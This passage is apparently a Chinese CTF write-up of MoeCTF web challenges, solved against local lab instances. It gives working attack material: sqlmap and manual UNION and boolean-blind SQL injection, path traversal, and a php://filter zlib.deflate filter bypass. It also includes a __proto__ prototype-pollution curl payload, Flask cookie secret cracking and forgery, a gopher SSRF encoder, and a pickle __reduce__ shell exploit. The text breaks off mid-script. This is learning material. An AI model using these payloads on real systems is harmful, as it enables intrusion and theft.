<span class="hljs-keyword">import</span> Pool, cpu_count<br><br><span class="hljs-comment"># 固定 IV（Base64 解码后 12 字节）</span><br>COMMON_IV = base64.b64decode(<span class="hljs-string">"bW9lY3RmMjAyNml2"</span>)<br><br><span class="hljs-comment"># 从题目中复制出的所有密文（示例只列出一条，实际请补全 100 条）</span><br>ENCRYPTED_DATA = [<br>    <span class="hljs-string">"kCyxN2+qCfUK3LMzZQzM5UqhVK7pIfstn6iWuR/HRZHnZlJtcw3CqD7IIJZDqxBsM2Oy8FvZ3RrmXFAoxbsYLHWz2pwZkMXrYHWONUrGaqZYqoKBO82Ax/kbIpqFt4tOWLU3KiTrBrKlf1sLlDbu1s3h4oC85VfM7Xo2XDxFJH0ZBoxAZamyCj+Lc3xW7k4esrG/UsOjLeCCkpcULK0uAUyvUlL5L57RmXKregggHfYIHlnL2wWkbxl+MvXBfLN2+g9dg+LNBWqTotnlnZkdyPTLc3Zd7haUKAcm7ZscbKs18FienfeZAoZnpcYy+PERStZsM/lfbiktM2qm9zm2yR5XyprlMiXJHNEwQA+BBmdUYFlKaN5twrGjN8ymc2xUU+nvgYyFrZEzyQn1Dji+0d4HQBqLQ98Vf33zkZL9ScaZIOjcmoIKFjDZ2xm1gwfZjs0Xx72XPSYiNeLbfbIrAAqg187y52EO5GR9T6SSVzd8Q0f+GlkH4Xb5acyksFWz2gniAEKr10fVaDk6LYyzEtTvJKSPR6yZs3vfXumT0nl87JvyIOeo1ID3/QyRMbvXhqPCifLa9NWbQz32rRd+UdiTPgN531aY"</span><br>    <span class="hljs-comment"># ... 其他 99 条</span><br>]<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">try_decrypt</span>(<span class="hljs-params">sid_range</span>):<br>    <span class="hljs-string">"""对给定学号范围进行解密尝试，返回解密成功的结果列表"""</span><br>    start, end = sid_range<br>    results = []<br>    <span class="hljs-keyword">for</span> sid_int <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(start, end):<br>        sid_str = <span class="hljs-string">f"<span class="hljs-subst">{sid_int:08d}</span>"</span><br>        key = hashlib.sha256(sid_str.encode()).digest()<br>        cipher = AES.new(key, AES.MODE_GCM, nonce=COMMON_IV)<br>        <span class="hljs-keyword">for</span> idx, data_b64 <span class="hljs-keyword">in</span> <span class="hljs-built_in">enumerate</span>(ENCRYPTED_DATA):<br>            <span class="hljs-keyword">try</span>:<br>                ciphertext = base64.b64decode(data_b64)<br>                plain = cipher.decrypt_and_verify(ciphertext[:-<span class="hljs-number">16</span>], ciphertext[-<span class="hljs-number">16</span>:])<br>                student = json.loads(plain)<br>                <span class="hljs-keyword">if</span> student.get(<span class="hljs-string">"学号"</span>) == sid_str:<br>                    results.append((sid_str, idx, student))<br>                    <span class="hljs-built_in">print</span>(<span class="hljs-string">f"[+] Found SID: <span class="hljs-subst">{sid_str}</span> -&gt; <span class="hljs-subst">{student}</span>"</span>)<br>                    <span class="hljs-comment"># 可选：从列表中移除已解密的条目以加速后续搜索</span><br>            <span class="hljs-keyword">except</span> (ValueError, KeyError, json.JSONDecodeError):<br>                <span class="hljs-keyword">continue</span><br>    <span class="hljs-keyword">return</span> results<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>():<br>    total = <span class="hljs-number">10</span>**<span class="hljs-number">8</span><br>    workers = cpu_count()<br>    chunk_size = total // workers<br>    ranges = [(i * chunk_size, (i+<span class="hljs-number">1</span>) * chunk_size) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(workers)]<br>    <span class="hljs-comment"># 处理余数</span><br>    ranges[-<span class="hljs-number">1</span>] = (ranges[-<span class="hljs-number">1</span>][<span class="hljs-number">0</span>], total)<br><br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f"Starting brute force with <span class="hljs-subst">{workers}</span> processes..."</span>)<br>    <span class="hljs-keyword">with</span> Pool(workers) <span class="hljs-keyword">as</span> pool:<br>        all_results = pool.<span class="hljs-built_in">map</span>(try_decrypt, ranges)<br>    <span class="hljs-keyword">for</span> res <span class="hljs-keyword">in</span> all_results:<br>        <span class="hljs-keyword">for</span> r <span class="hljs-keyword">in</span> res:<br>            <span class="hljs-built_in">print</span>(r)<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">"__main__"</span>:<br>    main()<br></code></pre></td></tr></table></figure>
<p>最后爆破得到<code>moectf{y0u_c@n_reAd_th3_htmI_Annmnd_Buwuuurp_1IllIIlIIl11llII}</code><br>这个题是不是应该放到crypto里……</p>
<h2 id="当零来敲门"><a href="#当零来敲门" class="headerlink" title="当零来敲门"></a>当零来敲门</h2><p>题目给了两个端口，一个可以ssh连接，一个是聊天室，但是这个python服务端口啥用也没有?调os看了看进程真的跟聊天室一点关系都没有，我们回到聊天室。<br>阅读js</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">async</span> <span class="hljs-keyword">function</span> <span class="hljs-title function_">send</span>(<span class="hljs-params"></span>) {<br>    <span class="hljs-keyword">let</span> u = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">'username'</span>).<span class="hljs-property">value</span> || <span class="hljs-string">"无名氏"</span>;<br>    <span class="hljs-keyword">let</span> mInput = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">'msg'</span>);<br>    <span class="hljs-keyword">let</span> m = <span class="hljs-built_in">parseInt</span>(mInput.<span class="hljs-property">value</span>);<br>    <span class="hljs-keyword">if</span>(<span class="hljs-built_in">isNaN</span>(m)) <span class="hljs-keyword">return</span>;<br>    <br>    mInput.<span class="hljs-property">value</span> = <span class="hljs-string">''</span>;<br>    <br>    <span class="hljs-keyword">await</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-string">'/chat'</span>, {<br>        <span class="hljs-attr">method</span>: <span class="hljs-string">'POST'</span>,<br>        <span class="hljs-attr">headers</span>: {<span class="hljs-string">'Content-Type'</span>: <span class="hljs-string">'application/json'</span>},<br>        <span class="hljs-attr">body</span>: <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>({<span class="hljs-attr">user</span>: u, <span class="hljs-attr">msg</span>: m})<br>    });<br>}<br>    <br></code></pre></td></tr></table></figure>

<p>核心在send,我们可以发现发送消息需要在/chat端口发送post请求，以json格式<br>最简单的思路就是……HTTP pipelining：连续在这个机器人发0之前发500条（纯web思路……）然后等服务器慢慢处理</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> json<br><span class="hljs-keyword">import</span> time<br><br>HOST = <span class="hljs-string">"127.0.0.1"</span><br>PORT = <span class="hljs-number">35931</span><br><br>  <br><br><span class="hljs-comment"># 等待林林发 0，保证进度归零</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">"[*] waiting for reset..."</span>)<br>time.sleep(<span class="hljs-number">11</span>)<br>s = socket.create_connection((HOST, PORT))<br><br>payload = <span class="hljs-string">b""</span><span class="hljs-comment"># 发送字节数据所以要encode</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, <span class="hljs-number">501</span>):<br>body = json.dumps({<br><span class="hljs-string">"user"</span>: <span class="hljs-string">"a"</span>,<br><span class="hljs-string">"msg"</span>: i<br>}).encode()<br><br><br>req = (<br><span class="hljs-string">f"POST /chat HTTP/1.1\r\n"</span><br><span class="hljs-string">f"Host: <span class="hljs-subst">{HOST}</span>:<span class="hljs-subst">{PORT}</span>\r\n"</span><br><span class="hljs-string">f"Content-Type: application/json\r\n"</span><br><span class="hljs-string">f"Content-Length: <span class="hljs-subst">{<span class="hljs-built_in">len</span>(body)}</span>\r\n"</span><br><span class="hljs-string">f"Connection: keep-alive\r\n"</span><br><span class="hljs-string">f"\r\n"</span><br>).encode() + body<br><br>payload += req<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">"[*] sending 1..500"</span>)<br>s.sendall(payload)<br><br>resp = <span class="hljs-string">b""</span><br>s.settimeout(<span class="hljs-number">10</span>)<br><br><span class="hljs-keyword">try</span>:<br>	<span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>		chunk = s.recv(<span class="hljs-number">65536</span>)<br>		<span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> chunk:<br>			<span class="hljs-keyword">break</span><br>resp += chunk<br><br><span class="hljs-keyword">except</span> socket.timeout:<br>	<span class="hljs-keyword">pass</span><br><span class="hljs-built_in">print</span>(resp.decode(errors=<span class="hljs-string">"ignore"</span>))<br></code></pre></td></tr></table></figure>
<p>最后可得<code>moectf{PYtHON_l4ngu@g3_1s_so_sImpL3_thAT-We-can_MAKE_5Ome-small-and-practical-tools0}</code></p>
<h2 id="古籍翻阅"><a href="#古籍翻阅" class="headerlink" title="古籍翻阅"></a>古籍翻阅</h2><p>下载附件发现是路径的汇总，连接靶机告知要翻阅所有目录内容，测试发现url后的book参数是附件中的路径，附件导入yakit字典进行fuzz<br>找到状态为200的发现true_file提示：其实flag藏在了根目录下，去看看根目录吧。<br>初步推测是路径穿越，最终../../flag成功，访问读取flag<br><code>moectf{re@d_the_r00t_5utr4_w1th_path_tr4v3r5@l}</code></p>
<h2 id="河湖小盗"><a href="#河湖小盗" class="headerlink" title="河湖小盗"></a>河湖小盗</h2><p>根据这个题目描述感觉是sql注入。</p>
<p>测试输入 1 合法 1’不合法，输入 1’ or ‘1’ = ‘1不合法，而1 or 1 = 1可以打印出所有名单，那么推测后端是<code>select * from  database where id = ?</code></p>
<h3 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h3><p>使用sqlmap对id参数进行注入测试，<br><code>sqlmap -u "http://127.0.0.1:33205/" --data="id=1" -p id --batch</code><br>可以探测到union注入成功了，我们继续读取数据<br>爆数据库 –dbs</p>
<figure class="highlight inform7"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs inform7">available databases <span class="hljs-comment">[3]</span>: <br><span class="hljs-comment">[*]</span> information_schema <span class="hljs-comment">[*]</span> past_paper <span class="hljs-comment">[*]</span> performance_schema<br></code></pre></td></tr></table></figure>
<p>因为前后都是mysql自带的库，所以我们爆past_paper的表</p>
<figure class="highlight gherkin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs gherkin">[3 tables]<br> +-----------------+ <br>|<span class="hljs-string"> flag_table </span>|<span class="hljs-string"> </span><br><span class="hljs-string"></span>|<span class="hljs-string"> past_paper </span>|<span class="hljs-string"> </span><br><span class="hljs-string"></span>|<span class="hljs-string"> public_subjects </span>|<br> +-----------------+<br></code></pre></td></tr></table></figure>
<p>继续爆表</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">sqlmap -u <span class="hljs-string">"http://127.0.0.1:33205/"</span> <span class="hljs-attr">--data</span>= <span class="hljs-string">"id=1"</span> -D past_paper -T flag_table <span class="hljs-attr">--dump</span> -<span class="hljs-selector-tag">p</span> id <span class="hljs-attr">--batch</span><br></code></pre></td></tr></table></figure>
<p>因为懒得爆列所以直接dump了<br>得到<code>moectf{h3re_i5_your_7e$7_pap3r}</code></p>
<h3 id="手动注入"><a href="#手动注入" class="headerlink" title="手动注入"></a>手动注入</h3><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-number">1</span> <span class="hljs-keyword">order</span> <span class="hljs-keyword">by</span> <span class="hljs-number">3</span> // <span class="hljs-number">3</span>列<br><span class="hljs-number">-1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span><span class="hljs-comment">-- // 2,3都有回显，随便挑一个回显点继续</span><br><span class="hljs-number">-1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-keyword">database</span>(),<span class="hljs-number">3</span><span class="hljs-comment">--// 爆出数据库</span><br><span class="hljs-number">-1</span> <span class="hljs-keyword">UNION</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-number">1</span>,group_concat(<span class="hljs-built_in">table_name</span>),<span class="hljs-number">3</span> <span class="hljs-keyword">FROM</span> information_schema.<span class="hljs-keyword">tables</span> <span class="hljs-keyword">WHERE</span> table_schema=<span class="hljs-string">'past_paper'</span><span class="hljs-comment">--//爆表</span><br><span class="hljs-number">-1</span> <span class="hljs-keyword">UNION</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-number">1</span>,group_concat(<span class="hljs-built_in">column_name</span>),<span class="hljs-number">3</span> <span class="hljs-keyword">FROM</span> information_schema.<span class="hljs-keyword">columns</span> <span class="hljs-keyword">WHERE</span> table_schema=<span class="hljs-string">'past_paper'</span> <span class="hljs-keyword">AND</span> <span class="hljs-built_in">table_name</span>=<span class="hljs-string">'flag_table'</span><span class="hljs-comment">--//爆列</span><br><span class="hljs-number">-1</span> <span class="hljs-keyword">UNION</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-number">1</span>,flag,<span class="hljs-number">3</span> <span class="hljs-keyword">FROM</span> past_paper.flag_table<span class="hljs-comment">--//查询</span><br></code></pre></td></tr></table></figure>
<ol>
<li>union注入是联合查询的内容放在一列回显的注入</li>
<li>在列数测试完成之后不用1用-1是为了使回显只出现我们查询的内容</li>
<li>group_concat是聚合函数，把多个查询结果合并为一个字符串</li>
</ol>
<h2 id="七狗免费小说"><a href="#七狗免费小说" class="headerlink" title="七狗免费小说"></a>七狗免费小说</h2><p>根据题目提示应该是php伪协议吧<br>根据F12的提示先开一下看看，可以在div none标签里看到隐藏的内容<br>整合后的关键逻辑如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">'file'</span>] ?? <span class="hljs-string">'chap1.html'</span>;<br><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">'/http|https|\.\.|^\/|=\/|index|input|data|convert|string/i'</span>,<span class="hljs-variable">$file</span>)) {<br>	<span class="hljs-keyword">die</span>(<span class="hljs-string">"咬你哦！"</span>);<br>}<br><br><span class="hljs-keyword">if</span> (<span class="hljs-variable">$file</span>) {<br>	<span class="hljs-title function_ invoke__">ob_start</span>();<span class="hljs-comment">//开启输入缓冲</span><br>	<span class="hljs-keyword">include</span>(<span class="hljs-variable">$file</span>);<br>	<span class="hljs-variable">$output</span> = <span class="hljs-title function_ invoke__">ob_get_clean</span>();<span class="hljs-comment">//清除缓冲</span><br>	<span class="hljs-keyword">if</span> (@<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">'//u'</span>, <span class="hljs-variable">$output</span>)) {<span class="hljs-comment">//正常utf-8内容</span><br>	<span class="hljs-keyword">echo</span> <span class="hljs-variable">$output</span>;<br>} <br><span class="hljs-keyword">else</span> {<br>	<span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">base64_encode</span>(<span class="hljs-variable">$output</span>);<br>}<br><br>}<br></code></pre></td></tr></table></figure>
<p>这里可以发现做了正则匹配，所以我们没办法用convert.base64-encode带出flag.php的内容<br><code>php://filter/read=convert.base64-encode/resource=index.php</code>(常规payload)<br>所以使用<br><code>php://filter/read=zlib.deflate/resource=flag.php</code><br>把flag.php的内容压缩成字节，并因为非utf-8输出base64的编码，把这段编码解码再解压得到内容<br>zlib.deflate是 PHP 的一个流过滤器，用来在读取文件内容的过程中对内容做 deflate 压缩。（一个无损压缩算法，用以把数据压缩成二进制）<br>php命令如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php">php -r <span class="hljs-string">'file_put_contents("out.bin", base64_decode($argv[1]));'</span> <span class="hljs-string">'lZDfToJgGMbPuQrGOmWgENQiPOs+/APZZtNlR7W2jMyIhGqu0NFKV6K21NpaTqFu5ns/vo68heAO6uA5et7neX97lEylWKFW9FJ2m96kmd2ylt/XDwuiVFiVBI3l0+s8y0vpFLvGCzIrCLyY1VOilJflI2aD0vLFMs1sJWGYvoE3QLOLn/veMrgEZ4Q9k9RG2LWjzimaz7HZJEYYeRbxa0puTwVziGZW7IHpY6O+DB7gycf9E+xOlKpKei8wdeB8AVcGtk00P1O4qopCjxzXofaJGzf4vYtbXzEEx9Hku43HH/i2Aa93ybfQi1qDBMGdEL8PzjV9UNrJ0WBbUTCM6VD4CM4ELZ7RrBmNuzA2lkEnKYrH+Iv+c5pRqV8= '</span><br><br><br>php -r <span class="hljs-string">'echo gzinflate(file_get_contents("out.bin"));'</span><br><span class="hljs-meta">&lt;?php</span> <span class="hljs-variable">$flag</span> = <span class="hljs-string">"moectf{d46d563e-0290-0621-8037-3304af146c77}"</span>; <span class="hljs-keyword">echo</span> <span class="hljs-string">"Flag 就在上面，只有聪明的人才能看见&lt;br&gt;剩下的剧情？大概是&lt;s&gt;被小刻吃掉了&lt;/s&gt;作者偷懒没放"</span>; <span class="hljs-comment">// 这段文字的作用只是触发 zlib 压缩，你可以不管它： // php php php php php php php php php php // php php php php php php php php php php ?&gt;</span><br></code></pre></td></tr></table></figure>

<h2 id="合乎周礼"><a href="#合乎周礼" class="headerlink" title="合乎周礼"></a>合乎周礼</h2><p>这个描述很像原型链污染……奈何我不是很会js也没咋打过原型链污染……所以这个是codex大人发力的()</p>
<p>先探测一下各个路径的信息，发现/api/me下有inheritedProbe，表示属性是继承的，直接发包/flag仍然无回显，利用原型链污染curl发包，实现污染可以读取/flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs exp">curl -X POST http://127.0.0.1:46127/api/profile\<br>-H 'Content-Type: application/json'\<br>--data '{"__proto__":{"isAdmin":true,"canReadFlag":true}}'<br></code></pre></td></tr></table></figure>

<p><code>__proto__</code>是 JavaScript 里一个特殊属性，用来访问或修改一个对象的原型。<br>发送的包类似于</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs js">profile.<span class="hljs-property">__proto__</span>.<span class="hljs-property">isAdmin</span>=<span class="hljs-literal">true</span>;<br><br>profile.<span class="hljs-property">__proto__</span>.<span class="hljs-property">canReadFlag</span>=<span class="hljs-literal">true</span>;<br></code></pre></td></tr></table></figure>
<h2 id="江洋大盗"><a href="#江洋大盗" class="headerlink" title="江洋大盗"></a>江洋大盗</h2><p>同河湖小盗应该是mysql的sql注入，然后给了附件blacklist<br>再次输入1 or 1 = 1进行测试，同样爆出了所有的数据，那么这个题应该是要考虑绕过方法。<br>列数探测3列成功，我们继续，但是使用双写绕过没有成功，测试1 and 1 = 1与 1 and 1 = 2,检验到bool盲注成功</p>
<p>然后开始驾驶sqlmap……<br><code>sqlmap -u http://127.0.0.1:36159/ --data=id=1 --batch --technique=B --string="林舟" -D past_paper -T flag_table --dump</code><br>注意要指定bool盲注和string作为正确参考…….不然也不知道为什么sqlmap自己指定了union还给我注了个假答案出来……<br><code>moectf{C0ngr@+u1@7|0ns_8u+_+h3re_wou1d_not_6e_any_pas7_3x@m_pap3r_in_f4ct}</code></p>
<h2 id="MoeCatchTheFrogs"><a href="#MoeCatchTheFrogs" class="headerlink" title="MoeCatchTheFrogs"></a>MoeCatchTheFrogs</h2><p>启动靶机，简单测试了一下发现前端没什么信息，检查发现存在app.js,分析代码逻辑，可以看到这一段代码</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">async</span> <span class="hljs-keyword">function</span> <span class="hljs-title function_">claimReward</span>(<span class="hljs-params"></span>) {<br>    claimButton.<span class="hljs-property">disabled</span> = <span class="hljs-literal">true</span>;<br>    <span class="hljs-keyword">try</span> {<br>        <span class="hljs-keyword">const</span> { response, data } = <span class="hljs-keyword">await</span> <span class="hljs-title function_">request</span>(<span class="hljs-string">"/api/claim"</span>);<br>        <span class="hljs-title function_">closeModal</span>(resultModal);<br>        <span class="hljs-keyword">if</span> (response.<span class="hljs-property">ok</span> &amp;&amp; data.<span class="hljs-property">flag</span>) {<br>            messageSymbol.<span class="hljs-property">textContent</span> = <span class="hljs-string">"✓"</span>;<br>            messageKicker.<span class="hljs-property">textContent</span> = <span class="hljs-string">"图鉴收集完成"</span>;<br>            messageTitle.<span class="hljs-property">textContent</span> = <span class="hljs-string">"这是属于你的奖励"</span>;<br>            messageContent.<span class="hljs-property">textContent</span> = <span class="hljs-string">"九种青蛙都已确认收录。感谢你为萌蛙研究所作出的贡献。"</span>;<br>            flagBox.<span class="hljs-property">textContent</span> = data.<span class="hljs-property">flag</span>;<br>            flagBox.<span class="hljs-property">hidden</span> = <span class="hljs-literal">false</span>;<br>        } <span class="hljs-keyword">else</span> {<br>            <span class="hljs-keyword">const</span> missing = <span class="hljs-title class_">Array</span>.<span class="hljs-title function_">isArray</span>(data.<span class="hljs-property">missing</span>) ? data.<span class="hljs-property">missing</span>.<span class="hljs-title function_">join</span>(<span class="hljs-string">"、"</span>) : <span class="hljs-string">"未知"</span>;<br>            messageSymbol.<span class="hljs-property">textContent</span> = <span class="hljs-string">"!"</span>;<br>            messageKicker.<span class="hljs-property">textContent</span> = <span class="hljs-string">"图鉴管理员来信"</span>;<br>            messageTitle.<span class="hljs-property">textContent</span> = <span class="hljs-string">"还差一点点"</span>;<br>            messageContent.<span class="hljs-property">textContent</span> = <span class="hljs-string">`尚未收录稀有度为 <span class="hljs-subst">${missing}</span> 的青蛙，集齐后再来领取奖励吧。`</span>;<br>            flagBox.<span class="hljs-property">hidden</span> = <span class="hljs-literal">true</span>;<br>        }<br>        <span class="hljs-title function_">openModal</span>(messageModal);<br>    } <span class="hljs-keyword">catch</span> {<br>        <span class="hljs-title function_">showToast</span>(<span class="hljs-string">"奖励领取失败，请稍后重试"</span>);<br>    } <span class="hljs-keyword">finally</span> {<br>        claimButton.<span class="hljs-property">disabled</span> = <span class="hljs-literal">false</span>;<br>    }<br>}<br></code></pre></td></tr></table></figure>

<p>分析可以得到，收集齐所有青蛙可以得到flag。<br>然而在我控制台抓取1000次之后还有1只没抓到，这时候就有点问题了，返回题目发现提示了cookie。重新观察cookie:<code>eyJmcm9ncyI6WzAsMSwyLDMsNCw1LDYsN119.aoQtcg.o0SV2JAl6aJIST6BBx2qGlef4x8</code></p>
<p>利用flask-unsign进行decode可以发现<code>{'frogs': [0, 1, 2, 3, 4, 5, 6, 7]}</code><br>然后用rockyou字典进行密钥爆破，可以得到密钥为<code>qwe123456</code>,根据密钥生成cookie<br><code>eyJmcm9ncyI6WzAsMSwyLDMsNCw1LDYsNyw4XX0.aoREvQ.9eiAoNQjsQzTsLMq0pUAygjgCaY</code><br>修改cookie后领取奖励可得到flag</p>
<ol>
<li>这里的cookie不能用控制台进行修改，否则失效，需要去存储里改</li>
<li>flask-unsign 是一个专门针对 Flask session cookie 的解码、爆破和伪造工具。</li>
</ol>
<p>很好的题目，使我大脑旋转</p>
<h2 id="熊出没"><a href="#熊出没" class="headerlink" title="熊出没"></a>熊出没</h2><p>根据题目所言是一些蜜罐。<br>打开靶机简单测试一下发现报错给出了gopher协议的提示。<br>输入正确url形式和提示端口有回显但是有陷阱。<br>那么，这应该是要利用gopher协议发送原始数据包。<br>一般都gopher协议格式为：</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dts"><span class="hljs-symbol">gopher:</span><span class="hljs-comment">//目标端口/数据信息</span><br></code></pre></td></tr></table></figure>

<p>（让ai梭了一个gopher编码的脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> urllib.parse <span class="hljs-keyword">import</span> quote_from_bytes<br><span class="hljs-comment"># ===== 数据区 =====</span><br>TARGET_HOST = <span class="hljs-string">"127.0.0.1"</span><br>TARGET_PORT = <span class="hljs-number">54321</span><br>RAW_PACKET = (<br>	<span class="hljs-string">b"GET / HTTP/1.0\r\n"</span><br>	<span class="hljs-string">b"\r\n"</span><br>)<br><span class="hljs-comment"># ========================</span><br>gopher_url = (<br>	<span class="hljs-string">f"gopher://<span class="hljs-subst">{TARGET_HOST}</span>:<span class="hljs-subst">{TARGET_PORT}</span>/_"</span><br>	+ quote_from_bytes(RAW_PACKET, safe=<span class="hljs-string">""</span>)<br>)<br><br><span class="hljs-built_in">print</span>(gopher_url)<br></code></pre></td></tr></table></figure>
<p>先发送最简的数据包发现给出了路径为/secret-honey<br>在脚本中添加路径重新构造payload发送可以获得flag</p>
<h2 id="我爱发明-thinking"><a href="#我爱发明-thinking" class="headerlink" title="我爱发明[thinking]"></a>我爱发明[thinking]</h2><p>用yakit可以爆出所有数据，而且很快（（（不过要拼手速抢一下token</p>
<h2 id="日志系统"><a href="#日志系统" class="headerlink" title="日志系统"></a>日志系统</h2><p>题目没啥信息。<br>下载附件并分析，这是一个python pickle反序列化，挠头。<br>官方文档<code>https://docs.python.org/3/library/pickle.html</code>,接下来构造利用反序列化的脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">from</span> pathlib <span class="hljs-keyword">import</span> Path<br><br>OUTPUT = Path(<span class="hljs-string">"/tmp/subdiary-exp.pkl"</span>)<br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Exploit</span>:<br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):<br>		command = [<span class="hljs-string">"/bin/sh"</span>, <span class="hljs-string">"-c"</span>, <span class="hljs-string">"env | sort"</span>]<br>		<span class="hljs-keyword">return</span> (<span class="hljs-built_in">__import__</span>(<span class="hljs-string">"subprocess"</span>).check_output, (command,))<br><br>OUTPUT.write_bytes(pickle.dumps(Exploit(), protocol=<span 